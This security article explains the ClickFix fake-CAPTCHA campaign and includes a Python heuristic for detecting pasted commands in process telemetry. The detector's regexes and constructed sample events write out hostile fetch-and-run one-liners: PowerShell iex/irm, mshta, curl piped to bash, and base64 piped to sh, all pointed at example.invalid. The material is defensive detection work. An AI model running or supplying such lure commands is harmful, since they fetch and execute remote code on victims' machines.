The ClickFix campaign is rapidly reshaping the social engineering threat landscape, catching both individuals and enterprise security teams off guard. First identified in early 2024 as an obscure technique, it has surged more than 500% in attack volume in 2025, making it the second most common attack vector after phishing. ClickFix tricks users into running malicious code on their own machines under the illusion of solving a fake problem, most often a page that looks like a CAPTCHA check.
Attackers distribute the malicious instructions through fake error dialogs, browser alerts, and fraudulent software update prompts, placed on compromised websites, in realistic malvertising banners, and in phishing emails. Victims reach these lures through a range of infection channels, including drive-by downloads and search engine poisoning, which broadens the campaign's reach beyond phishing and malvertising alone.
A typical scenario involves a user encountering a pop-up that imitates a trusted brand or system warning. Instead of recognizing the danger, they are persuaded to press a short sequence of keyboard shortcuts, typically Win+R to open the Run dialog, Ctrl+V to paste, then Enter. The page has already placed the malicious command on the clipboard when the user clicked the fake CAPTCHA, so those three keystrokes execute it in the Run dialog or a terminal. Users thus initiate their own compromise, and because no file is downloaded before that moment, attachment and download scanning has nothing to catch.
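To make the detection side of this concrete, the following is an added example written for this article, not code from Guardio Labs or from the campaign itself. It scores process-creation records for the combination of traits the paste flow above produces: a script host spawned directly under explorer.exe (the Run dialog's parent) or under a terminal or interactive shell, a command line that fetches and runs a second stage, hides its window or carries an encoded payload, and the reassuring CAPTCHA text the lure appends so the Run box shows something harmless. The record fields, the indicator regexes, the scoring threshold and the sample events are all assumptions constructed here; real sensors (Sysmon Event ID 1, EDR telemetry) expose the same parent image, image and command line fields under their own names. The example goes beyond the Windows Run dialog case in the text to the macOS and Linux terminal variants of the same lure.

```python
"""Heuristic detection of ClickFix-style pasted commands.

Added example for this article, not Guardio Labs code. Fields are a
simplified, hypothetical subset of a Sysmon Event ID 1 / EDR process
record. All sample events are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Parents under which a pasted command lands. On Windows the Run dialog's
# child is spawned directly by explorer.exe; on macOS/Linux the victim pastes
# into a terminal emulator or an interactive shell.
INTERACTIVE_PARENTS = {
    "explorer.exe",
    "terminal", "iterm2", "gnome-terminal-server", "konsole", "xterm",
    "bash", "zsh", "sh",
}

# Script hosts and downloaders the lures tell the victim to invoke.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "curl.exe", "certutil.exe",
    "bash", "sh", "zsh", "osascript", "curl", "python3",
}

# Command-line indicators: (name, compiled regex). Assumed patterns.
INDICATORS = [
    # fetch a second stage and run it in memory, no file download needed
    ("download_exec", re.compile(
        r"\biex\b|invoke-expression|invoke-webrequest|invoke-restmethod"
        r"|\birm\b|\biwr\b|downloadstring"
        r"|mshta\s+https?://"
        r"|(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b"
        r"|\$\(\s*(?:curl|wget)\b", re.I)),
    # keep the console invisible so the victim sees nothing happen
    ("hidden_window", re.compile(
        r"-w(?:indowstyle)?\s+hidden|-(?:ep|executionpolicy)\s+bypass", re.I)),
    # obscure the command that actually runs
    ("encoded_payload", re.compile(
        r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
        r"|base64\s+(?:-d|--decode)\b", re.I)),
    # the lure appends a reassuring comment so the Run box shows
    # "I am not a robot" rather than the command itself
    ("captcha_lure", re.compile(
        r"not a robot|recaptcha|verification id|captcha", re.I)),
]

THRESHOLD = 3  # assumed; tune against your own baseline


@dataclass
class Event:
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    host: str
    image: str
    indicators: List[str]
    score: int


def basename(path: str) -> str:
    """Last path component, lower-cased, for either path separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: Event) -> Optional[Finding]:
    """Score one process-creation record; None when below threshold."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    hits = [name for name, rx in INDICATORS if rx.search(ev.command_line)]
    if not hits:
        return None
    score = len(hits)
    if parent in INTERACTIVE_PARENTS and child in SCRIPT_HOSTS:
        score += 2  # the lineage a user-pasted command produces
    if "captcha_lure" in hits:
        score += 2  # nobody types a CAPTCHA receipt into Run on purpose
    if score < THRESHOLD:
        return None
    return Finding(ev.host, child, hits, score)


def scan(events: List[Event]) -> List[Finding]:
    """Return findings, in input order, for every record above threshold."""
    return [f for f in (classify(e) for e in events) if f is not None]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry; example.invalid is a reserved, non-resolving TLD.
SAMPLE_EVENTS = [
    # Windows: fake CAPTCHA lure pasted into Win+R
    Event("ws01", r"C:\Windows\explorer.exe", PS,
          'powershell -w hidden -c "iex (irm https://example.invalid/verify)" '
          '# I am not a robot - reCAPTCHA Verification ID: 7841'),
    # Windows: mshta variant of the same lure
    Event("ws02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
          "mshta https://example.invalid/check.hta"),
    # Windows: benign editor-launched shell, no download, nothing hidden
    Event("ws03", r"C:\Program Files\Editor\editor.exe", PS,
          "powershell -NoProfile -Command Get-ChildItem"),
    # Windows: hidden window under a service parent; suspicious, but not the
    # interactive lineage this rule targets, so it stays below threshold
    Event("ws04", r"C:\Windows\System32\services.exe", PS,
          "powershell -w hidden -c Get-Date"),
    # macOS: Terminal variant of the lure
    Event("mac01", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
          "/bin/bash", 'bash -c "$(curl -fsSL https://example.invalid/fix.sh)"'),
    # Linux: encoded one-liner pasted into an interactive shell
    Event("lx01", "/usr/bin/bash", "/usr/bin/sh",
          "sh -c 'echo aGVsbG8gd29ybGQgZnJvbSBjbGlja2ZpeA== | base64 -d | sh'"),
    # Linux: benign download to a file, nothing executed
    Event("lx02", "/usr/bin/bash", "/usr/bin/curl",
          "curl -fsSL https://example.invalid/file.txt -o file.txt"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.image} score={f.score} {','.join(f.indicators)}")
```

The threshold is deliberately conservative: a hidden window alone, or a download alone, is common in legitimate automation, so the rule only fires when indicators stack or when they sit on the interactive lineage a pasted command produces. On Windows the Run dialog also records what was typed under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth pulling during triage to recover the full pasted string when the logged command line was truncated or obfuscated.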
Guardio Labs' analysis of the evolving ClickFix campaign shows how adaptable it is. Attackers use the same lure to deliver a range of threats, from infostealers to remote access trojans to malware loaders, swapping the payload to fit their goals. The observed payload portfolio also includes ransomware, cryptominers, and tooling for maintaining long-term access and control.
What started as an isolated tactic has quickly become a widespread problem. Both criminal groups and suspected state-backed actors have adopted it, ramping up the scale of these attacks. The surge is so significant that Guardio's researchers refer to the current wave as CAPTCHAgeddon, marking how far the technique has spread and how reliably it catches targets off guard.
What makes ClickFix stand out is its quiet operation and ability to adapt quickly. Rather than pushing a file download, it leans on believable stories and carefully crafted user prompts, and it is the victim's own keystrokes that execute the payload. Older schemes like ClearFake tricked users with bogus browser update notices hosted on hacked WordPress sites and still needed the victim to run a downloaded file; ClickFix slips past defenses more subtly and is harder to spot. It is also no longer limited to Windows: infections have been documented on macOS and Linux, where the lure directs the victim to paste into a terminal instead of the Run dialog, making this a cross-platform threat.
ClickFix evolved from earlier scams like ClearFake by removing the reliance on file downloads and pairing more persuasive narratives with stronger evasion. Attackers hide payloads in files named to look like legitimate libraries, such as socket.io.min.js, and abuse trusted platforms such as Google Scripts to host the fake CAPTCHA flow, so the lure loads from a reputable domain that allow-lists and reputation-based filters are unlikely to block.
As Guardio Labs points out, this is not just an evolution of phishing. Behind the scenes there is a deliberate effort to obfuscate payloads, load stages dynamically, target multiple platforms, and lean on trusted infrastructure. Together these measures make the campaign harder to detect and far more persistent than its predecessors.